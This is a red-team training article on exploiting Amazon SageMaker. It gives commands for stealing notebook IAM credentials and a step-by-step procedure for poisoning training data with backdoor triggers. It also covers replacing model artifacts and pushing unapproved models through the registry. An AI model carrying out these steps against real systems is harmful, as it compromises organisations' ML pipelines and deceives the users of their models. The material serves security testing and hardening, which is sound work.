SageMaker Exploitation

advanced10 min readUpdated 2026-03-15

Red team attack methodology for Amazon SageMaker: endpoint exploitation, notebook instance attacks, training job manipulation, model artifact tampering, and VPC misconfigurations in ML workloads.

aws sagemaker endpoint-exploitation notebook-attacks training-job model-artifacts vpc red-team

SageMaker Exploitation

Amazon SageMaker provides the full ML lifecycle -- from data labeling and notebook-based development to distributed training, model hosting, and MLOps automation. This breadth creates a large attack surface. Unlike Bedrock where the model infrastructure is fully managed, SageMaker gives customers control over compute instances, container images, training scripts, and deployment configurations. Every point of customer control is a point of potential misconfiguration.

Endpoint Exploitation

Endpoint Enumeration

SageMaker endpoints host trained models for real-time inference. Each endpoint runs one or more model variants on dedicated compute instances.

# List all active endpoints
aws sagemaker list-endpoints --status-equals InService \
  --query 'Endpoints[].{Name:EndpointName,Created:CreationTime}' --output table
 
# Get endpoint details
aws sagemaker describe-endpoint --endpoint-name <name>
 
# Get endpoint configuration (reveals instance types, model artifacts)
aws sagemaker describe-endpoint-config --endpoint-config-name <config-name>
 
# Get model details (reveals container image and model artifact location)
aws sagemaker describe-model --model-name <model-name>

Model Extraction Through Inference

With sagemaker:InvokeEndpoint access, systematic querying can extract the model's behavior:

import boto3, json
 
client = boto3.client('sagemaker-runtime')
 
def query_endpoint(payload):
    response = client.invoke_endpoint(
        EndpointName='production-model',
        ContentType='application/json',
        Body=json.dumps(payload)
    )
    return json.loads(response['Body'].read())
 
# Systematic querying to map model behavior
# For classification models: query with crafted inputs to map decision boundaries
# For generative models: extract training data through targeted prompting

Endpoint Exposure

SageMaker endpoints are accessed through the AWS API (HTTPS via the SageMaker runtime SDK). However, common misconfigurations expose them more broadly:

Misconfiguration	Risk	Detection
Lambda proxy without auth	Public API Gateway routes to SageMaker	Check API Gateway configurations for SageMaker integrations
Overprivileged endpoint role	Endpoint IAM role with S3/DynamoDB access	Describe the endpoint execution role
Missing VPC endpoint policy	Any principal in the VPC can invoke	Check VPC endpoint policy for `sagemaker.runtime`
Cross-account access	Resource policies allowing external accounts	Review model and endpoint resource policies

Notebook Instance Attacks

Notebook as Pivot Point

SageMaker notebook instances are Jupyter servers running on EC2 instances with an IAM role attached. They are commonly the weakest link in the ML pipeline because:

Persistent compute with credentials: The notebook IAM role is accessible via the instance metadata service
Development environment: Data scientists install arbitrary packages, download external data, and run untrusted code
Network access: Notebooks often have access to both public internet and private VPC resources
Long-lived: Notebooks frequently run for weeks or months without patching

Credential Theft

# From a compromised notebook instance
# Access the IAM role credentials
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>
 
# Check what the notebook role can do
aws sts get-caller-identity
aws iam list-attached-role-policies --role-name <notebook-role>
 
# Common notebook role overprivileges:
# - s3:* (access all training data, model artifacts)
# - sagemaker:* (full SageMaker control)
# - bedrock:* (invoke any model)
# - logs:* (read all CloudWatch logs)

Lifecycle Configuration Attacks

SageMaker notebook lifecycle configurations run shell scripts on notebook start and creation. If an attacker can modify these scripts, they achieve persistent code execution:

# List lifecycle configurations
aws sagemaker list-notebook-instance-lifecycle-configs
 
# Get the script content
aws sagemaker describe-notebook-instance-lifecycle-config \
  --notebook-instance-lifecycle-config-name <name>
 
# The script is base64-encoded. Decode to review:
# Look for credential handling, network configuration,
# package installations from untrusted sources

Notebook Content Extraction

Notebooks (.ipynb files) stored on the instance or in connected Git repositories often contain:

Database connection strings and credentials
API keys for external services
Training data samples
Model architecture details and hyperparameters
Internal service URLs and endpoints
Data pipeline configurations

Training Job Manipulation

Training Data Access

Training jobs consume data from S3, EFS, or FSx. Identifying and accessing training data is a high-priority target:

# List recent training jobs
aws sagemaker list-training-jobs --sort-by CreationTime --sort-order Descending
 
# Get training job details including data source
aws sagemaker describe-training-job --training-job-name <name>
# Look for InputDataConfig[].DataSource.S3DataSource.S3Uri
# and OutputDataConfig.S3OutputPath

Training Pipeline Poisoning

Identify the training data source
From the training job configuration, extract the S3 URI containing training data. Check for write access to this bucket or prefix.
Understand the data format
Download sample training data to understand the format (CSV, JSON, JSONL, Parquet, etc.) and schema. The poisoned data must match this format exactly.
Craft poisoned data
Create data that introduces the desired model behavior. For classification models, inject mislabeled examples. For generative models, inject examples containing the target behavior (e.g., backdoor triggers).
Inject and trigger
Write poisoned data to the training S3 prefix. If training is scheduled, wait for the next run. If manual, social engineering or waiting for the next retraining cycle is required.

Training Container Attacks

SageMaker training jobs run in Docker containers. Organizations use either AWS-provided containers or custom containers from ECR. Custom container attacks:

Container image tampering: Replace the training container in ECR with a modified version that exfiltrates training data or installs a backdoor in the trained model
Dependency confusion: If the container installs packages at runtime, inject malicious packages through dependency confusion attacks
Resource abuse: Training instances have GPU access; a compromised training container can use these GPUs for cryptocurrency mining or other compute-intensive attacks

Model Artifact Tampering

Artifact Storage

Trained models are stored as artifacts (typically model.tar.gz) in S3. The artifact contains model weights, configuration files, and sometimes inference code.

# Find model artifacts
aws sagemaker describe-model --model-name <name>
# Look for PrimaryContainer.ModelDataUrl
 
# Download and inspect
aws s3 cp s3://bucket/path/model.tar.gz .
tar xzf model.tar.gz
# Inspect model files, code/ directory, inference.py

Model Replacement

If write access to the model artifact S3 location is available, the production model can be replaced:

Download the existing model artifact
Modify the model (change weights, inject backdoor in inference code)
Upload the modified artifact to the same S3 location
The next endpoint update or deployment picks up the modified model

Model Registry Attacks

SageMaker Model Registry tracks model versions with approval workflows. Attack vectors:

Approve unapproved models: If IAM allows sagemaker:UpdateModelPackage, change model status from PendingManualApproval to Approved
Register backdoored models: Register a new model version pointing to a tampered artifact
Model group hijacking: Create model versions in existing model groups, potentially displacing legitimate models in automated pipelines

VPC Misconfigurations

Network Isolation Failures

SageMaker supports VPC deployment for network isolation, but common misconfigurations undermine it:

Component	Misconfiguration	Impact
Notebook instances	Direct internet access enabled	Data exfiltration, C2 communication
Training jobs	No VPC configuration	Training data accessed over public internet
Endpoints	Public subnet with public IP	Endpoint accessible from the internet
VPC endpoints	Missing or overpermissive policies	Unauthorized service access within VPC

Inter-Service Communication

SageMaker components communicate with other AWS services (S3, ECR, CloudWatch). Without VPC endpoints, this traffic traverses the public internet. With VPC endpoints but without restrictive policies, any principal in the VPC can access these services.

# Check if notebook has direct internet access
aws sagemaker describe-notebook-instance --notebook-instance-name <name>
# DirectInternetAccess: "Enabled" is a finding
 
# Check VPC endpoint policies
aws ec2 describe-vpc-endpoints \
  --filters "Name=service-name,Values=com.amazonaws.*.sagemaker.runtime"

AWS AI Services Overview -- Service landscape and enumeration
IAM for AI Services -- IAM patterns and misconfigurations
Infrastructure & Supply Chain -- Supply chain attack techniques applicable to ML containers
AI Cost & Billing Attacks -- GPU compute abuse through SageMaker

Knowledge Check

You have compromised a SageMaker notebook instance and extracted the IAM role credentials. Which action would provide the most persistent impact on the ML pipeline?

Knowledge Check

A SageMaker model artifact stored in S3 contains a code/ directory with inference.py. Why is write access to this S3 location a critical finding?

References

SageMaker Security Documentation -- Official security best practices
SageMaker Network Isolation -- VPC and network isolation guidance
SageMaker Model Registry -- Model versioning and approval workflows

SageMaker Exploitation

Identify the training data source

Understand the data format

Craft poisoned data

Inject and trigger

Related articles

SageMaker Exploitation

Identify the training data source

Understand the data format

Craft poisoned data

Inject and trigger

Related articles